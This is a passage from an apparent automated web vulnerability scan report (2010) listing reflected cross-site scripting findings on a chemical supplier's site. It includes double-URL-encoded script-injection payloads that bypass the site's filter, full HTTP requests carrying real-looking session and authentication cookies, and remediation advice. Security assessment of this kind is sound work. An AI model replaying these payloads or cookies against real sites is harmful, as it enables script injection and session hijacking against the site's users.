Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:09 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldricheaa45";alert(1)//f70af8ceeb6/areas-of-interest/chemistry/stockroom-reagents","E404") ;
   </script>
...[SNIP]...

1.96. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e060%2522%253balert%25281%2529%252f%252f6f78925408c was submitted in the REST URL parameter 3. This input was echoed as 6e060";alert(1)//6f78925408c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest6e060%2522%253balert%25281%2529%252f%252f6f78925408c/chemistry/stockroom-reagents HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:10 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest6e060";alert(1)//6f78925408c/chemistry/stockroom-reagents","E404") ;
   </script>
...[SNIP]...

1.97. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c1b7%2522%253balert%25281%2529%252f%252fa5911bef3e6 was submitted in the REST URL parameter 4. This input was echoed as 8c1b7";alert(1)//a5911bef3e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/chemistry8c1b7%2522%253balert%25281%2529%252f%252fa5911bef3e6/stockroom-reagents HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:13 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/chemistry8c1b7";alert(1)//a5911bef3e6/stockroom-reagents","E404") ;
   </script>
...[SNIP]...

1.98. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7c82%2522%253balert%25281%2529%252f%252f18170b86b7a was submitted in the REST URL parameter 5. This input was echoed as e7c82";alert(1)//18170b86b7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagentse7c82%2522%253balert%25281%2529%252f%252f18170b86b7a HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:15 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagentse7c82";alert(1)//18170b86b7a","E404") ;
   </script>
...[SNIP]...

1.99. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/labware/labware-catalog [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/labware/labware-catalog

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1225e%2522%253balert%25281%2529%252f%252fb54150aa7a4 was submitted in the REST URL parameter 1. This input was echoed as 1225e";alert(1)//b54150aa7a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content1225e%2522%253balert%25281%2529%252f%252fb54150aa7a4/sigma-aldrich/areas-of-interest/labware/labware-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:04 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content1225e";alert(1)//b54150aa7a4/sigma-aldrich/areas-of-interest/labware/labware-catalog","E404") ;
   </script>
...[SNIP]...

1.100. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/labware/labware-catalog [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/labware/labware-catalog

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46b3b%2522%253balert%25281%2529%252f%252f4dfd3aae0d8 was submitted in the REST URL parameter 2. This input was echoed as 46b3b";alert(1)//4dfd3aae0d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich46b3b%2522%253balert%25281%2529%252f%252f4dfd3aae0d8/areas-of-interest/labware/labware-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
